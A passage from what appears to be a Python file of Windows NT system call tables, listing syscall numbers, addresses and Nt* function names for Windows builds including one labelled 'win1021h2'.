0x123 00007FFBF39E6350 NtOpenEventPair 0x33 00007FFBF39E4560 NtOpenFile 0x124 00007FFBF39E6370 NtOpenIoCompletion 0x125 00007FFBF39E6390 NtOpenJobObject 0x12 00007FFBF39E4140 NtOpenKey 0x126 00007FFBF39E63B0 NtOpenKeyEx 0x127 00007FFBF39E63D0 NtOpenKeyTransacted 0x128 00007FFBF39E63F0 NtOpenKeyTransactedEx 0x129 00007FFBF39E6410 NtOpenKeyedEvent 0x12A 00007FFBF39E6430 NtOpenMutant 0x12B 00007FFBF39E6450 NtOpenObjectAuditAlarm 0x12C 00007FFBF39E6470 NtOpenPartition 0x12D 00007FFBF39E6490 NtOpenPrivateNamespace 0x26 00007FFBF39E43C0 NtOpenProcess 0x12E 00007FFBF39E64B0 NtOpenProcessToken 0x30 00007FFBF39E4500 NtOpenProcessTokenEx 0x12F 00007FFBF39E64D0 NtOpenRegistryTransaction 0x130 00007FFBF39E64F0 NtOpenResourceManager 0x37 00007FFBF39E45E0 NtOpenSection 0x131 00007FFBF39E6510 NtOpenSemaphore 0x132 00007FFBF39E6530 NtOpenSession 0x133 00007FFBF39E6550 NtOpenSymbolicLinkObject 0x134 00007FFBF39E6570 NtOpenThread 0x24 00007FFBF39E4380 NtOpenThreadToken 0x2F 00007FFBF39E44E0 NtOpenThreadTokenEx 0x135 00007FFBF39E6590 NtOpenTimer 0x136 00007FFBF39E65B0 NtOpenTransaction 0x137 00007FFBF39E65D0 NtOpenTransactionManager 0x138 00007FFBF39E65F0 NtPlugPlayControl 0x5F 00007FFBF39E4AD0 NtPowerInformation 0x139 00007FFBF39E6610 NtPrePrepareComplete 0x13A 00007FFBF39E6630 NtPrePrepareEnlistment 0x13B 00007FFBF39E6650 NtPrepareComplete 0x13C 00007FFBF39E6670 NtPrepareEnlistment 0x0C013D 00007FFBF39E6690 NtPrivilegeCheck 0x13E 00007FFBF39E66B0 NtPrivilegeObjectAuditAlarm 0x13F 00007FFBF39E66D0 NtPrivilegedServiceAuditAlarm 0x140 00007FFBF39E66F0 NtPropagationComplete 0x141 00007FFBF39E6710 NtPropagationFailed 0x50 00007FFBF39E4900 NtProtectVirtualMemory 0x142 00007FFBF39E6730 NtPssCaptureVaSpaceBulk 0x70143 00007FFBF39E6750 NtPulseEvent 0x3D 00007FFBF39E46A0 NtQueryAttributesFile 0x144 00007FFBF39E6770 NtQueryAuxiliaryCounterFrequency 0x145 00007FFBF39E6790 NtQueryBootEntryOrder 0x146 00007FFBF39E67B0 NtQueryBootOptions 0x50147 00007FFBF39E67D0 NtQueryDebugFilterState 0x50015 00007FFBF39E41A0 NtQueryDefaultLocale 0x40044 00007FFBF39E4780 NtQueryDefaultUILanguage 0x35 00007FFBF39E45A0 NtQueryDirectoryFile 0x148 00007FFBF39E67F0 NtQueryDirectoryFileEx 0x149 00007FFBF39E6810 NtQueryDirectoryObject 0x14A 00007FFBF39E6830 NtQueryDriverEntryOrder 0x14B 00007FFBF39E6850 NtQueryEaFile 0x56 00007FFBF39E49C0 NtQueryEvent 0x14C 00007FFBF39E6870 NtQueryFullAttributesFile 0x14D 00007FFBF39E6890 NtQueryInformationAtom 0x14E 00007FFBF39E68B0 NtQueryInformationByName 0x14F 00007FFBF39E68D0 NtQueryInformationEnlistment 0x11 00007FFBF39E4120 NtQueryInformationFile 0x150 00007FFBF39E68F0 NtQueryInformationJobObject 0x151 00007FFBF39E6910 NtQueryInformationPort 0x19 00007FFBF39E4220 NtQueryInformationProcess 0x152 00007FFBF39E6930 NtQueryInformationResourceManager 0x25 00007FFBF39E43A0 NtQueryInformationThread 0x21 00007FFBF39E4320 NtQueryInformationToken 0x153 00007FFBF39E6950 NtQueryInformationTransaction 0x154 00007FFBF39E6970 NtQueryInformationTransactionManager 0x155 00007FFBF39E6990 NtQueryInformationWorkerFactory 0x40156 00007FFBF39E69B0 NtQueryInstallUILanguage 0x50157 00007FFBF39E69D0 NtQueryIntervalProfile 0x158 00007FFBF39E69F0 NtQueryIoCompletion 0x159 00007FFBF39E6A10 NtQueryIoRingCapabilities 0x16 00007FFBF39E41C0 NtQueryKey 0x15A 00007FFBF39E6A30 NtQueryLicenseValue 0x15B 00007FFBF39E6A50 NtQueryMultipleValueKey 0x15C 00007FFBF39E6A70 NtQueryMutant 0x10 00007FFBF39E4100 NtQueryObject 0x15D 00007FFBF39E6A90 NtQueryOpenSubKeys 0x15E 00007FFBF39E6AB0 NtQueryOpenSubKeysEx 0x50031 00007FFBF39E4520 NtQueryPerformanceCounter 0x1015F 00007FFBF39E6AD0 NtQueryPortInformationProcess 0x160 00007FFBF39E6AF0 NtQueryQuotaInformationFile 0x51 00007FFBF39E4920 NtQuerySection 0x161 00007FFBF39E6B10 NtQuerySecurityAttributesToken 0x162 00007FFBF39E6B30 NtQuerySecurityObject 0x163 00007FFBF39E6B50 NtQuerySecurityPolicy 0x164 00007FFBF39E6B70 NtQuerySemaphore 0x165 00007FFBF39E6B90 NtQuerySymbolicLinkObject 0x166 00007FFBF39E6BB0 NtQuerySystemEnvironmentValue 0x167 00007FFBF39E6BD0 NtQuerySystemEnvironmentValueEx 0x36 00007FFBF39E45C0 NtQuerySystemInformation 0x168 00007FFBF39E6BF0 NtQuerySystemInformationEx 0x38 00007FFBF39E4600 NtQueryTimer 0x0A0169 00007FFBF39E6C10 NtQueryTimerResolution 0x17 00007FFBF39E41E0 NtQueryValueKey 0x23 00007FFBF39E4360 NtQueryVirtualMemory 0x49 00007FFBF39E4820 NtQueryVolumeInformationFile 0x16A 00007FFBF39E6C30 NtQueryWnfStateData 0x16B 00007FFBF39E6C50 NtQueryWnfStateNameInformation 0x45 00007FFBF39E47A0 NtQueueApcThread 0x16C 00007FFBF39E6C70 NtQueueApcThreadEx 0x16D 00007FFBF39E6C90 NtQueueApcThreadEx2 0x16E 00007FFBF39E6CB0 NtRaiseException 0x16F 00007FFBF39E6CD0 NtRaiseHardError 0x1A0006 00007FFBF39E3FC0 NtReadFile 0x1A002E 00007FFBF39E44C0 NtReadFileScatter 0x170 00007FFBF39E6CF0 NtReadOnlyEnlistment 0x54 00007FFBF39E4980 NtReadRequestData 0x3F 00007FFBF39E46E0 NtReadVirtualMemory 0x171 00007FFBF39E6D10 NtReadVirtualMemoryEx 0x172 00007FFBF39E6D30 NtRecoverEnlistment 0x173 00007FFBF39E6D50 NtRecoverResourceManager 0x174 00007FFBF39E6D70 NtRecoverTransactionManager 0x175 00007FFBF39E6D90 NtRegisterProtocolAddressInformation 0x30176 00007FFBF39E6DB0 NtRegisterThreadTerminatePort 0x140177 00007FFBF39E6DD0 NtReleaseKeyedEvent 0x70020 00007FFBF39E4300 NtReleaseMutant 0x0C000A 00007FFBF39E4040 NtReleaseSemaphore 0x30178 00007FFBF39E6DF0 NtReleaseWorkerFactoryWorker 0x1C0009 00007FFBF39E4020 NtRemoveIoCompletion 0x179 00007FFBF39E6E10 NtRemoveIoCompletionEx 0x8017A 00007FFBF39E6E30 NtRemoveProcessDebug 0x17B 00007FFBF39E6E50 NtRenameKey 0x17C 00007FFBF39E6E70 NtRenameTransactionManager 0x17D 00007FFBF39E6E90 NtReplaceKey 0x17E 00007FFBF39E6EB0 NtReplacePartitionUnit 0x0C 00007FFBF39E4080 NtReplyPort 0x0B 00007FFBF39E4060 NtReplyWaitReceivePort 0x2B 00007FFBF39E4460 NtReplyWaitReceivePortEx 0x17F 00007FFBF39E6ED0 NtReplyWaitReplyPort 0x180 00007FFBF39E6EF0 NtRequestPort 0x22 00007FFBF39E4340 NtRequestWaitReplyPort 0x70181 00007FFBF39E6F10 NtResetEvent 0x0C0182 00007FFBF39E6F30 NtResetWriteWatch 0x183 00007FFBF39E6F50 NtRestoreKey 0x30184 00007FFBF39E6F70 NtResumeProcess 0x70052 00007FFBF39E4940 NtResumeThread 0x185 00007FFBF39E6F90 NtRevertContainerImpersonation 0x186 00007FFBF39E6FB0 NtRollbackComplete 0x187 00007FFBF39E6FD0 NtRollbackEnlistment 0x188 00007FFBF39E6FF0 NtRollbackRegistryTransaction 0x189 00007FFBF39E7010 NtRollbackTransaction 0x18A 00007FFBF39E7030 NtRollforwardTransactionManager 0x8018B 00007FFBF39E7050 NtSaveKey 0x0E018C 00007FFBF39E7070 NtSaveKeyEx 0x0B018D 00007FFBF39E7090 NtSaveMergedKeys 0x18E 00007FFBF39E70B0 NtSecureConnectPort 0x18F 00007FFBF39E70D0 NtSerializeBoot 0x190 00007FFBF39E70F0 NtSetBootEntryOrder 0x191 00007FFBF39E7110 NtSetBootOptions 0x192 00007FFBF39E7130 NtSetCachedSigningLevel 0x193 00007FFBF39E7150 NtSetCachedSigningLevel2 0x194 00007FFBF39E7170 NtSetContextThread 0x0A0195 00007FFBF39E7190 NtSetDebugFilterState 0x30196 00007FFBF39E71B0 NtSetDefaultHardErrorPort 0x50197 00007FFBF39E71D0 NtSetDefaultLocale 0x40198 00007FFBF39E71F0 NtSetDefaultUILanguage 0x199 00007FFBF39E7210 NtSetDriverEntryOrder 0x19A 00007FFBF39E7230 NtSetEaFile 0x7000E 00007FFBF39E40C0 NtSetEvent 0x3002D 00007FFBF39E44A0 NtSetEventBoostPriority 0x3019B 00007FFBF39E7250 NtSetHighEventPair 0x3019C 00007FFBF39E7270 NtSetHighWaitLowEventPair 0x7019D 00007FFBF39E7290 NtSetIRTimer 0x19E 00007FFBF39E72B0 NtSetInformationDebugObject 0x19F 00007FFBF39E72D0 NtSetInformationEnlistment 0x27 00007FFBF39E43E0 NtSetInformationFile 0x1A0 00007FFBF39E72F0 NtSetInformationIoRing 0x1A1 00007FFBF39E7310 NtSetInformationJobObject 0x1A2 00007FFBF39E7330 NtSetInformationKey 0x5C 00007FFBF39E4A70 NtSetInformationObject 0x1C 00007FFBF39E4280 NtSetInformationProcess 0x1A3 00007FFBF39E7350 NtSetInformationResourceManager 0x1A4 00007FFBF39E7370 NtSetInformationSymbolicLink 0x0D 00007FFBF39E40A0 NtSetInformationThread 0x1A5 00007FFBF39E7390 NtSetInformationToken 0x1A6 00007FFBF39E73B0 NtSetInformationTransaction 0x1A7 00007FFBF39E73D0 NtSetInformationTransactionManager 0x1A8 00007FFBF39E73F0 NtSetInformationVirtualMemory 0x1A9 00007FFBF39E7410 NtSetInformationWorkerFactory 0x501AA 00007FFBF39E7430 NtSetIntervalProfile 0x1AB 00007FFBF39E7450 NtSetIoCompletion 0x1AC 00007FFBF39E7470 NtSetIoCompletionEx 0x1AD 00007FFBF39E7490 NtSetLdtEntries 0x301AE 00007FFBF39E74B0 NtSetLowEventPair 0x301AF 00007FFBF39E74D0 NtSetLowWaitHighEventPair 0x1B0 00007FFBF39E74F0 NtSetQuotaInformationFile 0x1B1 00007FFBF39E7510 NtSetSecurityObject 0x1B2 00007FFBF39E7530 NtSetSystemEnvironmentValue 0x1B3 00007FFBF39E7550 NtSetSystemEnvironmentValueEx 0x1B4 00007FFBF39E7570 NtSetSystemInformation 0x1B5 00007FFBF39E7590 NtSetSystemPowerState 0x501B6 00007FFBF39E75B0 NtSetSystemTime 0x501B7 00007FFBF39E75D0 NtSetThreadExecutionState 0x62 00007FFBF39E4B30 NtSetTimer 0x1B8 00007FFBF39E75F0 NtSetTimer2 0x1B9 00007FFBF39E7610 NtSetTimerEx 0x0A01BA 00007FFBF39E7630 NtSetTimerResolution 0x401BB 00007FFBF39E7650 NtSetUuidSeed 0x60 00007FFBF39E4AF0 NtSetValueKey 0x1BC 00007FFBF39E7670 NtSetVolumeInformationFile 0x1BD 00007FFBF39E7690 NtSetWnfProcessNotificationEvent 0x401BE 00007FFBF39E76B0 NtShutdownSystem 0x1BF 00007FFBF39E76D0 NtShutdownWorkerFactory 0x1301C0 00007FFBF39E76F0 NtSignalAndWaitForSingleObject 0x1C1 00007FFBF39E7710 NtSinglePhaseReject 0x301C2 00007FFBF39E7730 NtStartProfile 0x301C3 00007FFBF39E7750 NtStopProfile 0x1C4 00007FFBF39E7770 NtSubmitIoRing 0x1C5 00007FFBF39E7790 NtSubscribeWnfStateChange 0x301C6 00007FFBF39E77B0 NtSuspendProcess 0x701C7 00007FFBF39E77D0 NtSuspendThread 0x1C8 00007FFBF39E77F0 NtSystemDebugControl 0x1C9 00007FFBF39E7810 NtTerminateEnclave 0x701CA 00007FFBF39E7830 NtTerminateJobObject 0x7002C 00007FFBF39E4480 NtTerminateProcess 0x70053 00007FFBF39E4960 NtTerminateThread 0x201CB 00007FFBF39E7850 NtTestAlert 0x1CC 00007FFBF39E7870 NtThawRegistry 0x1CD 00007FFBF39E7890 NtThawTransactions 0x1CE 00007FFBF39E78B0 NtTraceControl 0x5E 00007FFBF39E4AB0 NtTraceEvent 0x1101CF 00007FFBF39E78D0 NtTranslateFilePath 0x1D0 00007FFBF39E78F0 NtUmsThreadYield 0x1D1 00007FFBF39E7910 NtUnloadDriver 0x1D2 00007FFBF39E7930 NtUnloadKey 0x1D3 00007FFBF39E7950 NtUnloadKey2 0x1D4 00007FFBF39E7970 NtUnloadKeyEx 0x1D5 00007FFBF39E7990 NtUnlockFile 0x1D6 00007FFBF39E79B0 NtUnlockVirtualMemory 0x2A 00007FFBF39E4440 NtUnmapViewOfSection 0x1D7 00007FFBF39E79D0 NtUnmapViewOfSectionEx 0x1D8 00007FFBF39E79F0 NtUnsubscribeWnfStateChange 0x1D9 00007FFBF39E7A10 NtUpdateWnfStateData 0x1DA 00007FFBF39E7A30 NtVdmControl 0x601DB 00007FFBF39E7A50 NtWaitForAlertByThreadId 0x1DC 00007FFBF39E7A70 NtWaitForDebugEvent 0x1501DD 00007FFBF39E7A90 NtWaitForKeyedEvent 0x1D005B 00007FFBF39E4A50 NtWaitForMultipleObjects 0x1E001A 00007FFBF39E4240 NtWaitForMultipleObjects32 0x0D0004 00007FFBF39E3F80 NtWaitForSingleObject 0x1DE 00007FFBF39E7AB0 NtWaitForWorkViaWorkerFactory 0x301DF 00007FFBF39E7AD0 NtWaitHighEventPair 0x301E0 00007FFBF39E7AF0 NtWaitLowEventPair 0x30001 00007FFBF39E3F20 NtWorkerFactoryWorkerReady 0x1A0008 00007FFBF39E4000 NtWriteFile 0x1A001B 00007FFBF39E4260 NtWriteFileGather 0x57 00007FFBF39E49E0 NtWriteRequestData 0x3A 00007FFBF39E4640 NtWriteVirtualMemory 0x10046 00007FFBF39E47C0 NtYieldExecution 0x1ED 00007FFBF39E45C0 RtlGetNativeSystemInformation """ t=0 win1021h2="""SYSCALL ADDRESS FUNCTION ----------------------------------------- 0x02 00007FFEFDA0CD70 NtAcceptConnectPort 0x00 00007FFEFDA0CD30 NtAccessCheck 0x29 00007FFEFDA0D250 NtAccessCheckAndAuditAlarm 0x63 00007FFEFDA0D980 NtAccessCheckByType 0x59 00007FFEFDA0D850 NtAccessCheckByTypeAndAuditAlarm 0x64 00007FFEFDA0D9A0 NtAccessCheckByTypeResultList 0x65 00007FFEFDA0D9C0 NtAccessCheckByTypeResultListAndAuditAlarm 0x66 00007FFEFDA0D9E0 NtAccessCheckByTypeResultListAndAuditAlarmByHandle 0x67 00007FFEFDA0DA00 NtAcquireCrossVmMutant 0x68 00007FFEFDA0DA20 NtAcquireProcessActivityReference 0x0A0047 00007FFEFDA0D610 NtAddAtom 0x110069 00007FFEFDA0DA40 NtAddAtomEx 0x6A 00007FFEFDA0DA60 NtAddBootEntry 0x6B 00007FFEFDA0DA80 NtAddDriverEntry 0x6C 00007FFEFDA0DAA0 NtAdjustGroupsToken 0x41 00007FFEFDA0D550 NtAdjustPrivilegesToken 0x6D 00007FFEFDA0DAC0 NtAdjustTokenClaimsAndDeviceGroups 0x7006E 00007FFEFDA0DAE0 NtAlertResumeThread 0x3006F 00007FFEFDA0DB00 NtAlertThread 0x40070 00007FFEFDA0DB20 NtAlertThreadByThreadId 0x40071 00007FFEFDA0DB40 NtAllocateLocallyUniqueId 0x72 00007FFEFDA0DB60 NtAllocateReserveObject 0x73 00007FFEFDA0DB80 NtAllocateUserPhysicalPages 0x74 00007FFEFDA0DBA0 NtAllocateUserPhysicalPagesEx 0x110075 00007FFEFDA0DBC0 NtAllocateUuids 0x18 00007FFEFDA0D030 NtAllocateVirtualMemory 0x76 00007FFEFDA0DBE0 NtAllocateVirtualMemoryEx 0x77 00007FFEFDA0DC00 NtAlpcAcceptConnectPort 0x78 00007FFEFDA0DC20 NtAlpcCancelMessage 0x79 00007FFEFDA0DC40 NtAlpcConnectPort 0x7A 00007FFEFDA0DC60 NtAlpcConnectPortEx 0x7B 00007FFEFDA0DC80 NtAlpcCreatePort 0x7C 00007FFEFDA0DCA0 NtAlpcCreatePortSection 0x7D 00007FFEFDA0DCC0 NtAlpcCreateResourceReserve 0x7E 00007FFEFDA0DCE0 NtAlpcCreateSectionView 0x7F 00007FFEFDA0DD00 NtAlpcCreateSecurityContext 0x80 00007FFEFDA0DD20 NtAlpcDeletePortSection 0x81 00007FFEFDA0DD40 NtAlpcDeleteResourceReserve 0x82 00007FFEFDA0DD60 NtAlpcDeleteSectionView 0x83 00007FFEFDA0DD80 NtAlpcDeleteSecurityContext 0x84 00007FFEFDA0DDA0 NtAlpcDisconnectPort 0x85 00007FFEFDA0DDC0 NtAlpcImpersonateClientContainerOfPort 0x86 00007FFEFDA0DDE0 NtAlpcImpersonateClientOfPort 0x87 00007FFEFDA0DE00 NtAlpcOpenSenderProcess 0x88 00007FFEFDA0DE20 NtAlpcOpenSenderThread 0x89 00007FFEFDA0DE40 NtAlpcQueryInformation 0x8A 00007FFEFDA0DE60 NtAlpcQueryInformationMessage 0x8B 00007FFEFDA0DE80 NtAlpcRevokeSecurityContext 0x8C 00007FFEFDA0DEA0 NtAlpcSendWaitReceivePort 0x8D 00007FFEFDA0DEC0 NtAlpcSetInformation 0x4C 00007FFEFDA0D6B0 NtApphelpCacheControl 0x5008E 00007FFEFDA0DEE0 NtAreMappedFilesTheSame 0x8008F 00007FFEFDA0DF00 NtAssignProcessToJobObject 0x90 00007FFEFDA0DF20 NtAssociateWaitCompletionPacket 0x91 00007FFEFDA0DF40 NtCallEnclave 0x05 00007FFEFDA0CDD0 NtCallbackReturn 0x5D 00007FFEFDA0D8C0 NtCancelIoFile 0x92 00007FFEFDA0DF60 NtCancelIoFileEx 0x93 00007FFEFDA0DF80 NtCancelSynchronousIoFile 0x61 00007FFEFDA0D940 NtCancelTimer 0x94 00007FFEFDA0DFA0 NtCancelTimer2 0x95 00007FFEFDA0DFC0 NtCancelWaitCompletionPacket 0x3003E 00007FFEFDA0D4F0 NtClearEvent 0x3000F 00007FFEFDA0CF10 NtClose 0x3B 00007FFEFDA0D490 NtCloseObjectAuditAlarm 0x96 00007FFEFDA0DFE0 NtCommitComplete 0x97 00007FFEFDA0E000 NtCommitEnlistment 0x98 00007FFEFDA0E020 NtCommitRegistryTransaction 0x99 00007FFEFDA0E040 NtCommitTransaction 0x9A 00007FFEFDA0E060 NtCompactKeys 0x9B 00007FFEFDA0E080 NtCompareObjects 0x9C 00007FFEFDA0E0A0 NtCompareSigningLevels 0x9D 00007FFEFDA0E0C0 NtCompareTokens 0x9E 00007FFEFDA0E0E0 NtCompleteConnectPort 0x3009F 00007FFEFDA0E100 NtCompressKey 0xA0 00007FFEFDA0E120 NtConnectPort 0x43 00007FFEFDA0D590 NtContinue 0xA1 00007FFEFDA0E140 NtContinueEx 0xA2 00007FFEFDA0E160 NtConvertBetweenAuxiliaryCounterAndPerformanceCounter 0xA3 00007FFEFDA0E180 NtCreateCrossVmEvent 0xA4 00007FFEFDA0E1A0 NtCreateCrossVmMutant 0xA5 00007FFEFDA0E1C0 NtCreateDebugObject 0xA6 00007FFEFDA0E1E0 NtCreateDirectoryObject 0xA7 00007FFEFDA0E200 NtCreateDirectoryObjectEx 0xA8 00007FFEFDA0E220 NtCreateEnclave 0xA9 00007FFEFDA0E240 NtCreateEnlistment 0x48 00007FFEFDA0D630 NtCreateEvent 0xAA 00007FFEFDA0E260 NtCreateEventPair 0x55 00007FFEFDA0D7D0 NtCreateFile 0xAB 00007FFEFDA0E280 NtCreateIRTimer 0xAC 00007FFEFDA0E2A0 NtCreateIoCompletion 0xAD 00007FFEFDA0E2C0 NtCreateJobObject 0xAE 00007FFEFDA0E2E0 NtCreateJobSet 0x1D 00007FFEFDA0D0D0 NtCreateKey 0xAF 00007FFEFDA0E300 NtCreateKeyTransacted 0xB0 00007FFEFDA0E320 NtCreateKeyedEvent 0xB1 00007FFEFDA0E340 NtCreateLowBoxToken 0xB2 00007FFEFDA0E360 NtCreateMailslotFile 0xB3 00007FFEFDA0E380 NtCreateMutant 0xB4 00007FFEFDA0E3A0 NtCreateNamedPipeFile 0xB5 00007FFEFDA0E3C0 NtCreatePagingFile 0xB6 00007FFEFDA0E3E0 NtCreatePartition 0xB7 00007FFEFDA0E400 NtCreatePort 0xB8 00007FFEFDA0E420 NtCreatePrivateNamespace 0xB9 00007FFEFDA0E440 NtCreateProcess 0x4D 00007FFEFDA0D6D0 NtCreateProcessEx 0xBA 00007FFEFDA0E460 NtCreateProfile 0xBB 00007FFEFDA0E480 NtCreateProfileEx 0xBC 00007FFEFDA0E4A0 NtCreateRegistryTransaction 0xBD 00007FFEFDA0E4C0 NtCreateResourceManager 0x4A 00007FFEFDA0D670 NtCreateSection 0xBE 00007FFEFDA0E4E0 NtCreateSectionEx 0xBF 00007FFEFDA0E500 NtCreateSemaphore 0xC0 00007FFEFDA0E520 NtCreateSymbolicLinkObject 0x4E 00007FFEFDA0D6F0 NtCreateThread 0xC1 00007FFEFDA0E540 NtCreateThreadEx 0xC2 00007FFEFDA0E560 NtCreateTimer 0xC3 00007FFEFDA0E580 NtCreateTimer2 0xC4 00007FFEFDA0E5A0 NtCreateToken 0xC5 00007FFEFDA0E5C0 NtCreateTokenEx 0xC6 00007FFEFDA0E5E0 NtCreateTransaction 0xC7 00007FFEFDA0E600 NtCreateTransactionManager 0xC8 00007FFEFDA0E620 NtCreateUserProcess 0xC9 00007FFEFDA0E640 NtCreateWaitCompletionPacket 0xCA 00007FFEFDA0E660 NtCreateWaitablePort 0xCB 00007FFEFDA0E680 NtCreateWnfStateName 0xCC 00007FFEFDA0E6A0 NtCreateWorkerFactory 0x800CD 00007FFEFDA0E6C0 NtDebugActiveProcess 0xCE 00007FFEFDA0E6E0 NtDebugContinue 0x60034 00007FFEFDA0D3B0 NtDelayExecution 0x400CF 00007FFEFDA0E700 NtDeleteAtom 0xD0 00007FFEFDA0E720 NtDeleteBootEntry 0xD1 00007FFEFDA0E740 NtDeleteDriverEntry 0xD2 00007FFEFDA0E760 NtDeleteFile 0xD3 00007FFEFDA0E780 NtDeleteKey 0xD4 00007FFEFDA0E7A0 NtDeleteObjectAuditAlarm 0xD5 00007FFEFDA0E7C0 NtDeletePrivateNamespace 0xD6 00007FFEFDA0E7E0 NtDeleteValueKey 0xD7 00007FFEFDA0E800 NtDeleteWnfStateData 0xD8 00007FFEFDA0E820 NtDeleteWnfStateName 0x1B0007 00007FFEFDA0CE10 NtDeviceIoControlFile 0xD9 00007FFEFDA0E840 NtDirectGraphicsCall 0xDA 00007FFEFDA0E860 NtDisableLastKnownGood 0xDB 00007FFEFDA0E880 NtDisplayString 0xDC 00007FFEFDA0E8A0 NtDrawText 0x3C 00007FFEFDA0D4B0 NtDuplicateObject 0x42 00007FFEFDA0D570 NtDuplicateToken 0xDD 00007FFEFDA0E8C0 NtEnableLastKnownGood 0xDE 00007FFEFDA0E8E0 NtEnumerateBootEntries 0xDF 00007FFEFDA0E900 NtEnumerateDriverEntries 0x32 00007FFEFDA0D370 NtEnumerateKey 0xE0 00007FFEFDA0E920 NtEnumerateSystemEnvironmentValuesEx 0xE1 00007FFEFDA0E940 NtEnumerateTransactionObject 0x13 00007FFEFDA0CF90 NtEnumerateValueKey 0xE2 00007FFEFDA0E960 NtExtendSection 0xE3 00007FFEFDA0E980 NtFilterBootOption 0xE4 00007FFEFDA0E9A0 NtFilterToken 0xE5 00007FFEFDA0E9C0 NtFilterTokenEx 0x0A0014 00007FFEFDA0CFB0 NtFindAtom 0x4B 00007FFEFDA0D690 NtFlushBuffersFile 0xE6 00007FFEFDA0E9E0 NtFlushBuffersFileEx 0xE7 00007FFEFDA0EA00 NtFlushInstallUILanguage 0x0C00E8 00007FFEFDA0EA20 NtFlushInstructionCache 0x300E9 00007FFEFDA0EA40 NtFlushKey 0xEA 00007FFEFDA0EA60 NtFlushProcessWriteBuffers 0xEB 00007FFEFDA0EA80 NtFlushVirtualMemory 0x100EC 00007FFEFDA0EAA0 NtFlushWriteBuffer 0xED 00007FFEFDA0EAC0 NtFreeUserPhysicalPages 0x1E 00007FFEFDA0D0F0 NtFreeVirtualMemory 0xEE 00007FFEFDA0EAE0 NtFreezeRegistry 0xEF 00007FFEFDA0EB00 NtFreezeTransactions 0x1B0039 00007FFEFDA0D450 NtFsControlFile 0xF0 00007FFEFDA0EB20 NtGetCachedSigningLevel 0xF1 00007FFEFDA0EB40 NtGetCompleteWnfStateSubscription 0xF2 00007FFEFDA0EB60 NtGetContextThread 0x1900F3 00007FFEFDA0EB80 NtGetCurrentProcessorNumber 0xF4 00007FFEFDA0EBA0 NtGetCurrentProcessorNumberEx 0x700F5 00007FFEFDA0EBC0 NtGetDevicePowerState 0xF6 00007FFEFDA0EBE0 NtGetMUIRegistryInfo 0xF7 00007FFEFDA0EC00 NtGetNextProcess 0xF8 00007FFEFDA0EC20 NtGetNextThread 0xF9 00007FFEFDA0EC40 NtGetNlsSectionPtr 0xFA 00007FFEFDA0EC60 NtGetNotificationResourceManager 0xFB 00007FFEFDA0EC80 NtGetWriteWatch 0x300FC 00007FFEFDA0ECA0 NtImpersonateAnonymousToken 0x7001F 00007FFEFDA0D110 NtImpersonateClientOfPort 0xFD 00007FFEFDA0ECC0 NtImpersonateThread 0xFE 00007FFEFDA0ECE0 NtInitializeEnclave 0xFF 00007FFEFDA0ED00 NtInitializeNlsFiles 0x100 00007FFEFDA0ED20 NtInitializeRegistry 0x110101 00007FFEFDA0ED40 NtInitiatePowerAction 0x8004F 00007FFEFDA0D710 NtIsProcessInJob 0x10102 00007FFEFDA0ED60 NtIsSystemResumeAutomatic 0x103 00007FFEFDA0ED80 NtIsUILanguageComitted 0x104 00007FFEFDA0EDA0 NtListenPort 0x105 00007FFEFDA0EDC0 NtLoadDriver 0x106 00007FFEFDA0EDE0 NtLoadEnclaveData 0x107 00007FFEFDA0EE00 NtLoadKey 0x108 00007FFEFDA0EE20 NtLoadKey2 0x1D6 00007FFEFDA107E0 NtLoadKey3 0x109 00007FFEFDA0EE40 NtLoadKeyEx 0x10A 00007FFEFDA0EE60 NtLockFile 0x5010B 00007FFEFDA0EE80 NtLockProductActivationKeys 0x3010C 00007FFEFDA0EEA0 NtLockRegistryKey 0x10D 00007FFEFDA0EEC0 NtLockVirtualMemory 0x3010E 00007FFEFDA0EEE0 NtMakePermanentObject 0x3010F 00007FFEFDA0EF00 NtMakeTemporaryObject 0x110 00007FFEFDA0EF20 NtManageHotPatch 0x111 00007FFEFDA0EF40 NtManagePartition 0x112 00007FFEFDA0EF60 NtMapCMFModule 0x0A0113 00007FFEFDA0EF80 NtMapUserPhysicalPages 0x0A0003 00007FFEFDA0CD90 NtMapUserPhysicalPagesScatter 0x28 00007FFEFDA0D230 NtMapViewOfSection 0x114 00007FFEFDA0EFA0 NtMapViewOfSectionEx 0x115 00007FFEFDA0EFC0 NtModifyBootEntry 0x116 00007FFEFDA0EFE0 NtModifyDriverEntry 0x117 00007FFEFDA0F000 NtNotifyChangeDirectoryFile 0x118 00007FFEFDA0F020 NtNotifyChangeDirectoryFileEx 0x119 00007FFEFDA0F040 NtNotifyChangeKey 0x11A 00007FFEFDA0F060 NtNotifyChangeMultipleKeys 0x11B 00007FFEFDA0F080 NtNotifyChangeSession 0x58 00007FFEFDA0D830 NtOpenDirectoryObject 0x11C 00007FFEFDA0F0A0 NtOpenEnlistment 0x40 00007FFEFDA0D530 NtOpenEvent 0x11D 00007FFEFDA0F0C0 NtOpenEventPair 0x33 00007FFEFDA0D390 NtOpenFile 0x11E 00007FFEFDA0F0E0 NtOpenIoCompletion 0x11F 00007FFEFDA0F100 NtOpenJobObject 0x12 00007FFEFDA0CF70 NtOpenKey 0x120 00007FFEFDA0F120 NtOpenKeyEx 0x121 00007FFEFDA0F140 NtOpenKeyTransacted 0x122 00007FFEFDA0F160 NtOpenKeyTransactedEx 0x123 00007FFEFDA0F180 NtOpenKeyedEvent 0x124 00007FFEFDA0F1A0 NtOpenMutant 0x125 00007FFEFDA0F1C0 NtOpenObjectAuditAlarm 0x126 00007FFEFDA0F1E0 NtOpenPartition 0x127 00007FFEFDA0F200 NtOpenPrivateNamespace 0x26 00007FFEFDA0D1F0 NtOpenProcess 0x128 00007FFEFDA0F220 NtOpenProcessToken 0x30 00007FFEFDA0D330 NtOpenProcessTokenEx 0x129 00007FFEFDA0F240 NtOpenRegistryTransaction 0x12A 00007FFEFDA0F260 NtOpenResourceManager 0x37 00007FFEFDA0D410 NtOpenSection 0x12B 00007FFEFDA0F280 NtOpenSemaphore 0x12C 00007FFEFDA0F2A0 NtOpenSession 0x12D 00007FFEFDA0F2C0 NtOpenSymbolicLinkObject 0x12E 00007FFEFDA0F2E0 NtOpenThread 0x24 00007FFEFDA0D1B0 NtOpenThreadToken 0x2F 00007FFEFDA0D310 NtOpenThreadTokenEx 0x12F 00007FFEFDA0F300 NtOpenTimer 0x130 00007FFEFDA0F320 NtOpenTransaction 0x131 00007FFEFDA0F340 NtOpenTransactionManager 0x132 00007FFEFDA0F360 NtPlugPlayControl 0x5F 00007FFEFDA0D900 NtPowerInformation 0x133 00007FFEFDA0F380 NtPrePrepareComplete 0x134 00007FFEFDA0F3A0 